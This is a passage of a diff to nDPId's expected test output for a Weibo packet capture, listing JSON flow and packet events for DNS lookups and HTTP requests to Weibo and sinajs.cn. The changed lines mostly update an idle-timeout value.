+00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1463089071613,"flow_last_seen":1463089072125,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":450,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089072125,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"weibo.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1463089072138,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072138,"pkt":"eJKcD6iOkDVu60UQCABFAAA0XohAABsGZHc24aPSwKgBaQG7nfhaPbwDA69SioAQAIjCywAAAQEICgEjLGEAQNyy"} +00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":83,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1463089071613,"flow_last_seen":1463089072285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":12516,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1463089072285,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.weibo.com","url":"www.weibo.com\/login.php?lang=en-us","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1463089072333,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1463089072333,"pkt":"kDVu60UQeJKcD6iOCABFAAA9J7BAAEARj0XAqAFpwKgBAdEnADUAKd+0rc0BAAABAAAAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQAB"} 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072333,"flow_last_seen":1463089072333,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1463089072333,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00635{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1463089072444,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1463089072444,"pkt":"eJKcD6iOkDVu60UQCABFAACxAABAAEARtoHAqAEBwKgBaQA10ScAnYbirc2BgAABAAUAAAAAA2ltZwF0BnNpbmFqcwJjbgAAAQABwAwABQABAAAAAAAHBHdjZG7AEsAtAAUAAQAAACoAFQZzaW5hanMFY3NnbGIFdHhjZG7AGcBAAAUAAQAABBMAFAhuNGNzd2hrMwVnY2NkbgNuZXQAwGEAAQABAAAABAAEXbyG9sBhAAEAAQAAAAQABF28hvE="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"weibo.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089072333,"flow_last_seen":1463089072444,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1463089072444,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":53543,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"img.t.sinajs.cn","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"93.188.134.246"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8AXdAAEAGkoHAqAFpXbyG9ovbAFCLeghvAAAAAKACchAFvgAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8fClAAEAGF8\/AqAFpXbyG9ovcAFB8ZHUxAAAAAKACchCoEAAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8mn5AAEAG+XnAqAFpXbyG9ovdAFDX1pNmAAAAAKACchAuaAAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9tGfim0i3oIcKAS\/\/\/69gAAAgQFqAQCCAoDdgkqAEEJGAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0AXhAAEAGkojAqAFpXbyG9ovbAFCLeghwRn4ptYAQAOUoywAAAQEICgBBCR8Ddgkq"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9zPRoUNfGR1MqAS\/\/+5JgAAAgQFqAQCCAoDdgkrAEEJGAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0fCpAAEAGF9bAqAFpXbyG9ovcAFB8ZHUyz0aFDoAQAOXm+gAAAQEICgBBCR8Ddgkr"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi90SpJVX19aTZ6AS\/\/\/r1QAAAgQFqAQCCAoDdgksAEEJGAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0mn9AAEAG+YDAqAFpXbyG9ovdAFDX1pNnEqSVWIAQAOUZqgAAAQEICgBBCR8Ddgks"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8AXdAAEAGkoHAqAFpXbyG9ovbAFCLeghvAAAAAKACchAFvgAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8fClAAEAGF8\/AqAFpXbyG9ovcAFB8ZHUxAAAAAKACchCoEAAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072445,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089072445,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1463089072445,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072445,"pkt":"kDVu60UQeJKcD6iOCABFAAA8mn5AAEAG+XnAqAFpXbyG9ovdAFDX1pNmAAAAAKACchAuaAAAAgQFtAQCCAoAQQkYAAAAAAEDAwc="} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9tGfim0i3oIcKAS\/\/\/69gAAAgQFqAQCCAoDdgkqAEEJGAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0AXhAAEAGkojAqAFpXbyG9ovbAFCLeghwRn4ptYAQAOUoywAAAQEICgBBCR8Ddgkq"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi9zPRoUNfGR1MqAS\/\/+5JgAAAgQFqAQCCAoDdgkrAEEJGAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0fCpAAEAGF9bAqAFpXbyG9ovcAFB8ZHUyz0aFDoAQAOXm+gAAAQEICgBBCR8Ddgkr"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072471,"pkt":"eJKcD6iOkDVu60UQCABFAAA8AABAADgGm\/hdvIb2wKgBaQBQi90SpJVX19aTZ6AS\/\/\/r1QAAAgQFqAQCCAoDdgksAEEJGAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089072471,"pkt":"kDVu60UQeJKcD6iOCABFAAA0mn9AAEAG+YDAqAFpXbyG9ovdAFDX1pNnEqSVWIAQAOUZqgAAAQEICgBBCR8Ddgks"} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":420,"flow_tot_l4_payload_len":420,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1463089072471,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/base\/frame.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":432,"flow_tot_l4_payload_len":432,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/style\/css\/module\/combination\/comb_login.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} +00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089072445,"flow_last_seen":1463089072472,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1463089072472,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"img.t.sinajs.cn","url":"img.t.sinajs.cn\/t6\/skin\/default\/skin.css?version=201605130537","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1463089072885,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089072885,"pkt":"kDVu60UQeJKcD6iOCABFAAA8J\/lAAEARjv3AqAFpwKgBAaGIADUAKAcnK+gBAAABAAAAAAAAAmpzAXQGc2luYWpzAmNuAAABAAE="} 00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"weibo.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089072885,"flow_last_seen":1463089072885,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089072885,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":41352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"js.t.sinajs.cn","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} @@ -94,146 +94,146 @@ 